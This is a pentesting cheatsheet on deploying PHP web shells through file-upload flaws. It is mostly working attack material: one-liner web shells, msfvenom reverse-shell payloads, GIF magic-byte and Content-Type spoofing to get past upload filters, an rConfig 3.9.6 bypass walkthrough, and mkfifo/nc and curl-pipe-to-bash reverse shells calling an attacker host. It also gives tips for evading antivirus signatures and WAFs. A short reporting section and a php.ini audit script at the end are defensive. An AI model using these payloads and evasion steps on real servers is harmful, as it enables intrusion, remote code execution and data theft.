Methodology Checklist
- Identify PHP file upload or write capability
- Minimal shell: <?php system($_GET['cmd']); ?>
- Upload to webroot and trigger via URL: http://[TARGET]/shell.php?cmd=id
- Test that command execution works
- Upgrade to full reverse shell via web shell command
- Full Laudanum PHP shell for interactive browser access
- Clean up web shell file immediately after getting reverse shell
Operational Context
Use when: Quick RCE via file upload or LFI-to-write: a minimal PHP one-liner web shell that is small, fast, and bypasses many filters.
Think Dumber First: <?php system($_GET['cmd']); ?> is 29 characters and 100% functional. Upload or inject it, then curl http://[TARGET]/shell.php?cmd=id. If system() is blocked, try passthru(), shell_exec(), exec(), popen(), proc_open().
Skip when: PHP is disabled; check file extension support and web tech fingerprinting first.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw > shell.php | Generate PHP reverse shell payload |
| echo 'GIF89a;' > shell.php && msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw >> shell.php | PHP payload with GIF magic bytes (bypass content-type check) |
| curl -X POST -F "file=@shell.php;type=image/gif" http://[DOMAIN]/upload.php | Upload PHP as GIF via MIME type spoofing (curl) |
| sudo nc -lvnp 443 | Catch the reverse shell from PHP payload |
| <?php system($_GET['cmd']); ?> | Minimal PHP web shell (manual creation) |
| curl http://[TARGET]/shell.php?cmd=whoami | Execute command via PHP GET parameter |
Deep Dive & Workflow
Why PHP Web Shells Work
PHP (~78% of web servers) runs server-side: uploading a .php file means the server executes your code rather than just serving it. This grants direct OS access as the web server user (www-data, apache, IIS AppPool).
Exploiting rConfig 3.9.6: File Upload Bypass Walkthrough
Constraint: Upload form accepts only image extensions (.png, .jpg, .gif)
Step-by-Step Burp Suite Bypass:
1. Configure browser to proxy through Burp (127.0.0.1:8080)
2. Navigate: Devices > Vendors > Add Vendor
3. Select your .php shell as "Vendor Logo"
4. Intercept the POST request in Burp
5. Locate Content-Type header for the file part:
   Content-Type: application/x-php
   Change to: Content-Type: image/gif
6. Forward the modified request
Server sees a valid image Content-Type and saves the file. Access at /images/vendor/shell.php.
Magic Bytes Method (No Burp Needed)
```bash
# Prepend GIF magic bytes to make it look like a GIF to file inspectors
echo 'GIF89a;' > shell.php
msfvenom -p php/reverse_php LHOST=10.10.14.x LPORT=443 -f raw >> shell.php
# Upload normally: the file inspector sees the GIF signature
# Server stores the file, PHP code still executes
```
Minimal PHP Web Shell
```php
<?php system($_GET['cmd']); ?>
```
Access via: http://[TARGET]/shell.php?cmd=id
More feature-rich:
```php
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
```
From Web Shell to Reverse Shell
Web shells are limited β use them to upgrade to a full reverse shell immediately:
```bash
# Through web shell, execute:
# (URL-encode the & and | if using GET params)
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [ATTACKER_IP] 443 > /tmp/f
```
Or deliver via URL:
http://[TARGET]/shell.php?cmd=curl+http://[ATTACKER_IP]/rev.sh|bash
Web Shell Limitations & OPSEC
| Limitation | Impact |
|---|---|
| No interactive commands | Can't use sudo, nano, vim interactively |
| Stateless | Each request is a new process: no persistence of working directory |
| AV scans uploads | Remove comments, signatures, author credits from public shells |
| Stability | App may auto-delete uploaded files; convert to reverse shell fast |
| Documentation | Record: filename, path, hash, upload time for reporting + cleanup |
WhiteWinterWolf PHP Shell
Available on GitHub and popular in CTFs. Strip the author comments and function names before uploading in real engagements to avoid signature detection.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| system() function disabled | PHP disable_functions set | Try: passthru, shell_exec, exec, popen, proc_open; iterate through each |
| PHP shell returns blank page | All exec functions disabled | Use mail() bypass or PHP 7.4 FFI: $ffi = FFI::cdef('int system(const char *command);'); $ffi->system('cmd') |
| Web shell blocked by upload filter | Extension or content check | Try .php5, .phtml, .phar, .php7 extensions; add GIF header: GIF89a;<?php system($_GET['cmd']); ?> |
| Command output shows but special chars broken | Character encoding | Add htmlspecialchars_decode() wrapper or use raw passthru() instead of system() |
| Shell works via browser but not curl | WAF User-Agent filter | Add -A 'Mozilla/5.0 ...' to curl command to match browser UA |
Reporting Trigger
Finding Title: PHP Web Shell Deployed via File Upload or LFI
Impact: Minimal PHP web shell achieves persistent RCE through the web server process, with direct access to the server filesystem, environment variables, and internal network from the web application context.
Root Cause: Unrestricted file upload or Local File Inclusion vulnerability allows attacker to place and execute PHP code on the server.
Recommendation: Disable dangerous PHP functions in php.ini (system, exec, shell_exec, passthru). Validate file uploads by content, not extension. Run web application under dedicated low-privilege service account. Deploy WAF with PHP web shell signatures.
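The troubleshooting table shows why disabling system() alone is not enough: the shell falls back to passthru()/shell_exec(), to mail(), or to FFI. As an added example (not from the original page), this php.ini audit checks the full list from the Recommendation plus ffi.enable; the two ini fragments are constructed, not taken from a real host.

```python
import re

# The exec functions the troubleshooting table iterates through when system() is blocked
EXEC_FUNCTIONS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}

# Constructed php.ini fragments (not from a real host): a weak one and a hardened one
WEAK_INI = """
; Only system() blocked: a shell simply switches to passthru() or shell_exec()
disable_functions = system
ffi.enable = true
"""
HARDENED_INI = """
disable_functions = "system,exec,shell_exec,passthru,popen,proc_open,mail"
ffi.enable = false
"""


def parse_ini(text: str) -> dict[str, str]:
    """Minimal php.ini reader: key = value lines, ';' comments ignored, surrounding quotes stripped."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            settings[key.lower()] = value.strip('"')
    return settings


def audit(text: str) -> list[str]:
    """Return findings for settings that leave the fallbacks from the troubleshooting table usable."""
    settings = parse_ini(text)
    disabled = {f.strip().lower() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    findings = []
    still_enabled = sorted(EXEC_FUNCTIONS - disabled)
    if still_enabled:
        findings.append("exec functions still enabled: " + ", ".join(still_enabled))
    if "mail" not in disabled:
        findings.append("mail() enabled: the mail()-based bypass from the troubleshooting table needs it")
    # PHP 7.4+ defaults ffi.enable to "preload"; only an explicit true lets a web shell call FFI::cdef
    if settings.get("ffi.enable", "preload").lower() in ("true", "1", "on"):
        findings.append("ffi.enable=true: FFI::cdef can reach libc system() even with exec functions disabled")
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, "->", audit(ini) or "no findings")
```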